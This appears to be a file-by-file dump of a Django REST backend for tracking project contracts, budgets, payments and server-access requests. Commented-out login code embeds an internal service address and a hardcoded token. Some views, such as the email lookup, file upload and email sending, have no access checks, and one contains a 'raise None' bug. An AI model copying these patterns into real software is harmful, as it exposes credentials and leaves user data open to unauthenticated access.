pk):\n try:\n return PaymentPlan.objects.get(pk=pk)\n except PaymentPlan.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n paymentplan = self.get_object(pk)\n serializer = PaymentPlanSerializer(paymentplan)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n paymentplan = self.get_object(pk)\n serializer = PaymentPlanSerializer(paymentplan, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n paymentplan = self.get_object(pk)\n paymentplan.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass PaymentRecordListView(APIView):\n def get(self, request, format=None):\n paymentPlanPk = request.query_params.get(\"paymentPlanPk\", None)\n contractId = request.query_params.get(\"contractId\", None)\n if paymentPlanPk is None:\n paymentplans = PaymentRecord.objects.all()\n else:\n paymentplans = PaymentRecord.objects.all().filter(paymentPlanPk=paymentPlanPk)\n if contractId is not None:\n # chain the filter so an earlier paymentPlanPk filter is narrowed rather than replaced\n paymentplans = 
paymentplans.filter(contractId=contractId)\n serializer = PaymentRecordSerializer(paymentplans, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = PaymentRecordSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PaymentRecordDetailView(APIView):\n def get_object(self, pk):\n try:\n return PaymentRecord.objects.get(pk=pk)\n except PaymentRecord.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n paymentRecord = self.get_object(pk)\n serializer = PaymentRecordSerializer(paymentRecord)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n paymentRecord = self.get_object(pk)\n serializer = PaymentRecordSerializer(paymentRecord, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n paymentRecord = self.get_object(pk)\n paymentRecord.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET', 'POST'])\ndef getContractByPaymentPlan(request, pk):\n paymentPlan = PaymentPlan.objects.get(pk=pk)\n serializer = PaymentPlanSerializer(paymentPlan)\n contract = paymentPlan.contract\n contractId = contract.contractId\n return Response(data={\"contractId\": contractId, \"paymentPlan\": serializer.data})\n\n\n@api_view(['GET'])\ndef getContractByContractId(request):\n contract = Contract.objects.get(contractId=request.query_params.get(\"contractId\"))\n serializer = ContractSerializer(contract)\n return Response(serializer.data)\n\n\nclass ContractPaymentListView(generics.ListCreateAPIView):\n queryset = Contract.objects.all()\n pagination_class = Pagination\n serializer_class = ContractSerializer\n\n def get_queryset(self):\n # match contracts whose contractId or name starts with the search condition\n queryset = Contract.objects.all()\n condition = self.request.query_params.get(\"condition\", \"\")\n if condition == \"\":\n return queryset\n else:\n aQ = Q()\n aQ.add(Q(contractId__startswith=condition) | Q(name__startswith=condition), Q.AND)\n queryset = queryset.filter(aQ)\n return queryset\n\n"
},
{
"alpha_fraction": 0.5371900796890259,
"alphanum_fraction": 0.7190082669258118,
"avg_line_length": 17.149999618530273,
"blob_id": "b0064141df80106b8e8b526416041354ed0fdb13",
"content_id": "2e6571cf3d5c8e1abb72813e3fea6612ffd241b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 363,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "appdirs==1.4.0\nDjango==1.9\ndjango-cors-headers==1.3.1\ndjango-crispy-forms==1.6.1\ndjango-formtools==2.0\ndjango-simple-captcha==0.4.6\ndjangorestframework==3.5.1\nDjangoUeditor==1.8.143\net-xmlfile==1.0.1\ngunicorn==19.6.0\nhttplib2==0.9.2\njdcal==1.3\nolefile==0.44\nopenpyxl==2.4.1\npackaging==16.8\nPillow==4.0.0\nPyMySQL==0.7.9\npyparsing==2.1.10\npytz==2016.10\nsix==1.10.0\n"
},
{
"alpha_fraction": 0.6875424385070801,
"alphanum_fraction": 0.7057026624679565,
"avg_line_length": 49.80172348022461,
"blob_id": "9c0cb16ea7ef79351cdc43c0e21e43e25239bbc5",
"content_id": "598597911773b3bef52f0ca4145c5f985efc9e1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6586,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 116,
"path": "/apps/contractBudget/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\nfrom django.db import models\n\n\nclass Project(models.Model):\n projectId = models.CharField(max_length=200, unique=True, blank=False, verbose_name=\"项目编号\")\n name = models.CharField(max_length=200, blank=False, verbose_name=\"项目名称\")\n type = models.CharField(max_length=100, verbose_name=\"项目类型\")\n department = models.CharField(verbose_name=\"主办部门\", max_length=100,default=\"技术开发中心\")\n investment = models.FloatField(verbose_name=\"项目批复投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"项目批复维保费用\", default=0)\n development = models.FloatField(verbose_name=\"项目批复研发费用\", default=0)\n total = models.FloatField(verbose_name=\"项目批复总费用\", default=0)\n status = models.CharField(choices=((\"执行中\", \"执行中\"), (\"执行完\", \"执行完\"), (\"已移交\", \"已移交\")), default=\"执行中\", max_length=10,\n verbose_name=\"状态\")\n comment = models.CharField(max_length=500, verbose_name=\"备注\", blank=True)\n add_time = models.DateTimeField(default=datetime.now, verbose_name=\"添加时间\")\n lastModified = models.DateTimeField(default=datetime.now, verbose_name=\"最后修改时间\")\n\n class Meta:\n verbose_name = \"项目信息\"\n verbose_name_plural = verbose_name\n ordering = ('add_time',)\n\n\nclass Budget(models.Model):\n project = models.ForeignKey(Project, verbose_name=\"所属项目\")\n year = models.CharField(verbose_name=\"预算年度\", max_length=10)\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总计\",default=0)\n add_time = models.DateTimeField(verbose_name=\"添加时间\", default=datetime.now)\n lastModified = models.DateTimeField(verbose_name=\"最后修改时间\", default=datetime.now)\n\n class Meta:\n verbose_name = \"项目预算\"\n verbose_name_plural = verbose_name\n ordering = ('year',)\n\nclass Supplier(models.Model):\n supplierId = models.CharField(max_length=100,unique=True,verbose_name=\"供应商编号\",blank=False)\n accountName= models.CharField(max_length=100,verbose_name=\"开户名称\")\n bankMaster = models.CharField(max_length=50,verbose_name=\"开户银行\")\n bankBranch = models.CharField(max_length=50,verbose_name=\"开户支行\")\n accountId = models.CharField(max_length=100,verbose_name=\"银行账号\")\n accountAddr = models.CharField(max_length=100,verbose_name=\"开户所在地\")\n contact = models.CharField(max_length=50,verbose_name=\"联系人\")\n phone = models.CharField(max_length=50,verbose_name=\"联系方式\")\n email = models.CharField(max_length=50,verbose_name=\"电子邮箱地址\")\n add_time = models.DateTimeField(default=datetime.now,verbose_name=\"添加时间\")\n class Meta:\n verbose_name = \"供应商\"\n verbose_name_plural = verbose_name\n ordering = ('add_time',)\n\n\nclass Contract(models.Model):\n contractId = models.CharField(verbose_name=\"合同编号\",unique=True,max_length=100,blank=False)\n lawId = models.CharField(verbose_name=\"律审编号\",max_length=100,blank=True)\n project = models.ForeignKey(Project,verbose_name=\"所属项目\")\n status = models.CharField(choices=((\"执行中\",\"执行中\"),(\"执行完\",\"执行完\"),(\"已移交\",\"已移交\")),default=\"执行中\",max_length=10)\n supplierId = models.CharField(max_length=100,verbose_name=\"乙方编号\")\n accountName = models.CharField(max_length=50,verbose_name=\"乙方账户名称\")\n bankMaster = models.CharField(max_length=50,verbose_name=\"乙方开户行\")\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n 
development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总费用\", default=0)\n signDate = models.CharField(verbose_name=\"签署时间\",max_length=50)\n subscriber = models.CharField(verbose_name=\"签署人\",max_length=20)\n handlerPerson = models.CharField(verbose_name=\"合同经办人\",max_length=50)\n comment = models.CharField(verbose_name=\"合同内容\",max_length=500)\n name = models.CharField(verbose_name=\"合同名称\",max_length=50)\n\n class Meta:\n verbose_name = \"合同\"\n verbose_name_plural = verbose_name\n ordering = ('signDate',)\n\nclass PaymentPlan(models.Model):\n contract = models.ForeignKey(Contract,verbose_name=\"合同编号\")\n paymentTime = models.CharField(verbose_name=\"付款时间\",max_length=50)\n numOfPayments = models.IntegerField(verbose_name=\"付款笔数\")\n ratioOfPayments = models.CharField(verbose_name=\"付款比例\",max_length=10)\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总费用\", default=0)\n items = models.CharField(verbose_name=\"付款条款\",max_length=500,blank=True)\n\n class Meta:\n verbose_name = \"付款计划\"\n verbose_name_plural = verbose_name\n ordering = ('numOfPayments',)\n\nclass PaymentRecord(models.Model):\n contractId = models.CharField(verbose_name=\"合同编号\",max_length=50)\n paymentPlanId = models.CharField(verbose_name=\"付款计划编号\",max_length=50,default=\"\",blank=True)\n paymentPlanPk = models.CharField(verbose_name=\"付款计划id\",max_length=50,default=\"\",blank=True)\n numOfPayments = models.IntegerField(verbose_name=\"付款笔数\")\n billNum = models.CharField(verbose_name=\"报账单号\",max_length=50)\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总费用\", default=0)\n billTime = models.CharField(verbose_name=\"报账时间\",max_length=50)\n processTime = models.CharField(verbose_name=\"审批时间\",max_length=50,blank=True)\n\n class Meta:\n verbose_name = \"付款记录\"\n verbose_name_plural = verbose_name\n ordering = (\"processTime\",)"
},
{
"alpha_fraction": 0.8695651888847351,
"alphanum_fraction": 0.8695651888847351,
"avg_line_length": 69,
"blob_id": "47911f0086e69f1d8cab8375c7fe590c416e7409",
"content_id": "ccd3b1907bd7ff09acf73f545037cc039519d1b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 1,
"path": "/apps/serverApplication/__init__.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "default_app_config = \"serverApplication.apps.ServerapplicationConfig\""
},
{
"alpha_fraction": 0.7864077687263489,
"alphanum_fraction": 0.7864077687263489,
"avg_line_length": 19.600000381469727,
"blob_id": "ebbe746d04f7850491c9faabc60056b240019651",
"content_id": "1ffb75579891e2a088cdedb772c3bfcd3fd8a9f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/apps/contractBudget/apps.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ContractbudgetConfig(AppConfig):\n name = 'contractBudget'\n"
},
{
"alpha_fraction": 0.5166364312171936,
"alphanum_fraction": 0.6067755818367004,
"avg_line_length": 46.228572845458984,
"blob_id": "d1d7a249118126700bc09dd3b00e4d169b2b3260",
"content_id": "1627a19b848c5024acd8724ce96a6ed69e648a24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 35,
"path": "/apps/contractBudget/migrations/0007_paymentplan.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-31 14:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0006_auto_20170330_1331'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PaymentPlan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('paymentTime', models.CharField(max_length=50, verbose_name='\\u4ed8\\u6b3e\\u65f6\\u95f4')),\n ('numOfPayments', models.IntegerField(verbose_name='\\u4ed8\\u6b3e\\u7b14\\u6570')),\n ('ratioOfPayments', models.CharField(max_length=10, verbose_name='\\u4ed8\\u6b3e\\u6bd4\\u4f8b')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u603b\\u8d39\\u7528')),\n ('contract', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contractBudget.Contract', verbose_name='\\u5408\\u540c\\u7f16\\u53f7')),\n ],\n options={\n 'ordering': ('numOfPayments',),\n 'verbose_name': '\\u4ed8\\u6b3e\\u8ba1\\u5212',\n 'verbose_name_plural': '\\u4ed8\\u6b3e\\u8ba1\\u5212',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6630695462226868,
"alphanum_fraction": 0.6702637672424316,
"avg_line_length": 49.54545593261719,
"blob_id": "f8ed37799ccbf902f9c5a418acf1e4325420c0ce",
"content_id": "8bba344d057cb182d15563e5f655a263b8f64d11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1668,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 33,
"path": "/apps/application/adminx.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/15 10:48'\n\n\nimport xadmin\n\nfrom .models import RootApplication, ServerApplication,Order\n\n\nclass RootApplicationAdmin(object):\n list_display = ['user', 'ip', 'reason', 'status','applyTime','deadline','email']\n search_fields = ['user', 'ip', 'reason', 'status','email']\n list_filter = ['user', 'ip', 'reason', 'status','applyTime','deadline','email']\n\nclass ServerApplicationAdmin(object):\n\n list_display = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','department']\n search_fields = ['user','username','ip','source','environment','os','reason','email','orderId','status','department']\n list_filter = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','department']\n\n list_display = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','cpu','memory','store']\n search_fields = ['user','username','ip','source','environment','os','reason','email','orderId','status','cpu','memory','store']\n list_filter = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','cpu','memory','store']\n\n\nclass OrderAdmin(object):\n list_display = ['orderId','user','status','applyTime']\n search_fields = ['orderId','user','status']\n list_filter = ['orderId','user','status','applyTime']\nxadmin.site.register(RootApplication,RootApplicationAdmin)\nxadmin.site.register(ServerApplication,ServerApplicationAdmin)\nxadmin.site.register(Order,OrderAdmin)\n"
},
{
"alpha_fraction": 0.5224625468254089,
"alphanum_fraction": 0.5343177914619446,
"avg_line_length": 36.27131652832031,
"blob_id": "918fe2bb00907ff6f73ff77b42405e87bdb8fd8e",
"content_id": "df0a03a234bacbfbcf78e40ffed14aef0dc0fa9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4974,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 129,
"path": "/apps/users/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding: utf-8 -*-\nimport json\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .forms import LoginFrom\nfrom rest_framework import status\nfrom .models import UserProfile\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate,login\nfrom django.contrib.auth.backends import ModelBackend\nfrom django.db.models import Q\nfrom rest_framework import generics\nfrom rest_framework import status\nfrom django.http import Http404\n# from zeep import Client\n\n\nfrom .serializers import UserLoginSerializer, UserProfileSerializer\n# Create your views here.\n\nclass CustomBackend(ModelBackend):\n\tdef authenticate(self, username=None, password=None, **kwargs):\n\t\ttry:\n\t\t\tuser = UserProfile.objects.get(Q(username=username)|Q(email=username))\n\t\t\tif user.check_password(password):\n\t\t\t\treturn user\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\nclass LoginView(APIView):\n def get_object(self,email):\n try:\n return UserProfile.objects.get(email=email)\n except UserProfile.DoesNotExist:\n raise None\n\n def get(self,request,email):\n user = self.get_object(email)\n serializer = UserProfileSerializer(user)\n return Response(serializer.data)\n\n # return Response({\"msg\":u\"登录\"},status=status.HTTP_200_OK)\n\n def post(self,request):\n result = {}\n email = request.data.get(\"email\",False)\n pass_word = request.data.get(\"password\",\"\")\n print(request.data.get(\"email\",\"\"))\n user = authenticate(username=email,password=pass_word)\n if user is not None:\n if user.is_active:\n login(request,user)\n result = {\n 'info' : u\"成功登入,记得保存Cookie\" ,\n 'success' : True,\n 'code': status.HTTP_200_OK,\n 'name':\"张三\",\n 'department':\"系统室\"\n }\n return Response(data=result)\n else:\n return Response({\"msg\":u\"用户未激活\"},status=status.HTTP_401_UNAUTHORIZED)\n else:\n return Response({\"msg\":u\"用户名或密码错误\"},status=status.HTTP_200_OK)\n\n # def post(self,request):\n # result = {}\n # userSerializer = UserLoginSerializer(data=request.data)\n #\n # if userSerializer.is_valid():\n # email = request.data.get(\"email\",\"\")\n # password = request.data.get(\"password\",\"\")\n # client = Client('http://172.17.249.10/newsysservice/Portal.asmx?wsdl')\n # result1 = client.service.UserAuthenticate(UserAccount=email,Password=password)\n # #user = authenticate(username=email,password=password)\n # print(result1)\n # if result1 is True:\n # email = email[-len(email):-11]\n # print \"ddd\"+email\n # client = Client('http://172.17.249.10/newsysservice/userinfo.asmx?wsdl')\n # userInfo=client.service.GetUserInfo(Token='Kfzx01!',UserAccount=email)\n # userInfo = userInfo.encode(\"utf-8\")\n # userInfo = json.loads(userInfo)\n # print userInfo[\"TeamName\"]\n # result = {\n # 'info' : u\"成功登入,记得保存Cookie\" ,\n # 'success' : True,\n # 'code': status.HTTP_200_OK,\n # 'name':userInfo[\"UserName\"],\n # 'department':userInfo[\"TeamName\"]\n # }\n # response = Response(data=result)\n # return response\n # # else:\n # # result = {\n # # 'info' : u\"用户被禁止登录\" ,\n # # 'success' : False,\n # # 'code': status.HTTP_300_MULTIPLE_CHOICES\n # # }\n # # response = Response(data=result)\n # # return response\n # # else:\n # # result = {\n # # 'info' : u\"用户被禁止登录\" ,\n # # 'success' : False,\n # # 'code': status.HTTP_300_MULTIPLE_CHOICES\n # # }\n # else:\n # result = {\n # 'info': u\"用户名或密码错误\",\n # 'success': False,\n # 'code': status.HTTP_300_MULTIPLE_CHOICES\n #\n # }\n # return 
Response(data=result)\n # else:\n # result = {\n # 'info': u\"输入格式不正确\",\n # 'success': False,\n # 'code': status.HTTP_400_BAD_REQUEST\n # }\n # # return self.responseJson(result)\n # return Response(data=result)\n\n #验证通过后,根据sysnew邮箱获取用户信息\n def getUserByEmail(self,request):\n return Response(data={\"msg\":\"ok\"})\n"
},
{
"alpha_fraction": 0.5006954073905945,
"alphanum_fraction": 0.563282310962677,
"avg_line_length": 27.760000228881836,
"blob_id": "74c276d4cb4c0833de84ec66e579089d52619a68",
"content_id": "b7037b54485dba62bfae5c787d2bdba419136c69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 25,
"path": "/apps/serverApplication/migrations/0004_os.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-27 13:59\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0003_auto_20170211_1929'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Os',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('type', models.CharField(max_length=20, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf')),\n ],\n options={\n 'verbose_name': '\\u64cd\\u4f5c\\u7cfb\\u7edf',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6291989684104919,
"alphanum_fraction": 0.6366925239562988,
"avg_line_length": 42.011112213134766,
"blob_id": "0ca0780184cfdb9c208af21f5fcac7909f12985b",
"content_id": "e2b8655a32b3001fcc4de6cd98a6e74220eaff5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3992,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 90,
"path": "/apps/administrator/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom django.db.models import Q\nfrom django.contrib.auth import authenticate, login\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n# Create your views here.\nfrom users.forms import LoginFrom\nfrom application.models import RootApplication,ServerApplication,Order\nfrom application.serializers import RootApplicationSerializer,ServerApplicationSerializer\nfrom utils.email_send import send_email\nfrom .forms import ModelFormWithFileField\nclass LoginView(APIView):\n # def get(self, request):\n # return render(request, 'page_login.html')\n\n def post(self, request):\n loginForm = LoginFrom(request.POST)\n if loginForm.is_valid():\n email = request.POST.get(\"email\", \"\")\n password = request.POST.get(\"password\", \"\")\n # password = make_password(password=password)\n # administrator = UserProfile.objects.get(Q(email=email),Q(password=password))\n administrator = authenticate(username=email, password=password)\n if administrator:\n if administrator.is_active:\n # login(request, administrator)\n return Response({\"msg\": \"success\", \"status\": status.HTTP_200_OK})\n else:\n return Response({\"msg\": \"用户未激活\", \"status\": status.HTTP_403_FORBIDDEN})\n\n else:\n return Response({\"msg\": \"用户名或密码错误\", \"status\": status.HTTP_300_MULTIPLE_CHOICES})\n else:\n return Response({\"msg\": \"输入格式不正确\", \"status\": status.HTTP_400_BAD_REQUEST})\n\nclass RootApplicationListView(APIView):\n def get(self, request):\n condition = request.query_params.get(\"condition\")\n if condition == '1':\n allRootApplications = RootApplication.objects.filter(status='申请中')\n elif condition == '2':\n allRootApplications = RootApplication.objects.filter(status=\"使用中\")\n else:\n RootApplication().setExpiredApplication()\n allRootApplications = RootApplication().getExpiredApplication()\n serializer = RootApplicationSerializer(allRootApplications, many=True)\n return Response(serializer.data)\n\nclass ServerApplicationListView(APIView):\n def get(self,request):\n orderId = request.query_params.get(\"orderId\",None)\n type = request.query_params.get(\"type\")\n if orderId:\n allApplcations = ServerApplication.objects.all().filter(orderId=orderId)\n else:\n allApplcations = ServerApplication.objects.all()\n if type == '1':\n allApplcations = allApplcations.filter(status=\"申请中\")\n elif type == '2':\n allApplcations = allApplcations.filter(status=\"使用中\")\n else:\n allApplcations = allApplcations.filter(status=\"已到期\")\n serializer = ServerApplicationSerializer(allApplcations,many=True)\n return Response(serializer.data)\n\nclass EmailListView(APIView):\n def post(self,request):\n type = request.data.get(\"type\")\n sendTo = request.data.get(\"user\",\"\")\n content = request.data.get(\"content\",\"\")\n send_type = \"\"\n if type == '1':\n send_type = \"到期资源提醒\"\n elif type == '2':\n send_type = \"环境分配完成通知\"\n elif type == '3':\n send_type = request.data.get(\"theme\",\"\")\n # sendTo = sendTo.split(\";\")\n send_email(sendTo,content,send_type=send_type)\n return Response({\"msg\":\"发送成功\",\"status\":status.HTTP_200_OK})\n\nclass FileUploaderView(APIView):\n def post(self,request):\n form = ModelFormWithFileField(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n return Response({\"msg\":\"上传成功\",\"status\":status.HTTP_200_OK})\n else:\n return Response({\"msg\":\"上传失败\",\"status\":status.HTTP_200_OK})"
},
{
"alpha_fraction": 0.5302096009254456,
"alphanum_fraction": 0.6128236651420593,
"avg_line_length": 29.037036895751953,
"blob_id": "c18b5e32b2db36fc8c16cf2f73cbd1f985a89229",
"content_id": "5da40e4f3071c78120678776219314a957efaba4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 811,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 27,
"path": "/apps/contractBudget/migrations/0011_auto_20170406_0913.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-06 09:13\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0010_paymentrecord_paymentplanpk'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='contract',\n name='name',\n field=models.CharField(default=datetime.datetime(2017, 4, 6, 9, 13, 32, 738000), max_length=50, verbose_name='\\u5408\\u540c\\u540d\\u79f0'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='contract',\n name='comment',\n field=models.CharField(max_length=500, verbose_name='\\u5408\\u540c\\u5185\\u5bb9'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4755783975124359,
"alphanum_fraction": 0.5604113340377808,
"avg_line_length": 28.923076629638672,
"blob_id": "f45d0e3339427c4b6aeb882c1a734244e03f9f7d",
"content_id": "5ae0da63a427e92493053ca82f58af86205bf80c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 778,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 26,
"path": "/apps/serverApplication/migrations/0007_source.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 09:42\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0006_auto_20170227_1555'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Source',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=30, verbose_name='\\u6765\\u6e90')),\n ],\n options={\n 'verbose_name': '\\u9879\\u76ee\\u6765\\u6e90',\n 'verbose_name_plural': '\\u9879\\u76ee\\u6765\\u6e90',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.625,
"avg_line_length": 25,
"blob_id": "3c0db6db6d44caa23bf63d3399c70c00d5a659f9",
"content_id": "6a76f2ce502a161f144d64cf6643f4a07b529ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 520,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0012_auto_20170406_0918.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-06 09:18\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0011_auto_20170406_0913'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='paymentrecord',\n name='processTime',\n field=models.CharField(blank=True, max_length=50, verbose_name='\\u5ba1\\u6279\\u65f6\\u95f4'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5314401388168335,
"alphanum_fraction": 0.6186612844467163,
"avg_line_length": 23.649999618530273,
"blob_id": "b486070ab965dc62e3a1c2f08e46b23833de7ef9",
"content_id": "49cec29889803d3d22065862e13165e4b31b7fdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 20,
"path": "/apps/application/migrations/0003_auto_20170220_1052.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-20 10:52\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0002_auto_20170215_1349'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='rootapplication',\n name='deadline',\n field=models.DateTimeField(verbose_name='\\u622a\\u6b62\\u65e5\\u671f'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.36000001430511475,
"alphanum_fraction": 0.5066666603088379,
"avg_line_length": 24.33333396911621,
"blob_id": "7ad1ea33a1986bb0fc3659b93f046a67013de1f1",
"content_id": "42111a6e2b1be760b028fc38c04cd9b1a7302087",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 3,
"path": "/functionTests/__init__.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/4/6 16:11'"
},
{
"alpha_fraction": 0.469788521528244,
"alphanum_fraction": 0.6243705749511719,
"avg_line_length": 47.43902587890625,
"blob_id": "674fe6273b96214dc77a12377c828492e501a330",
"content_id": "365b9825a7c6fca91e60e065c1ff7af792a5c147",
"detected_licenses": [],
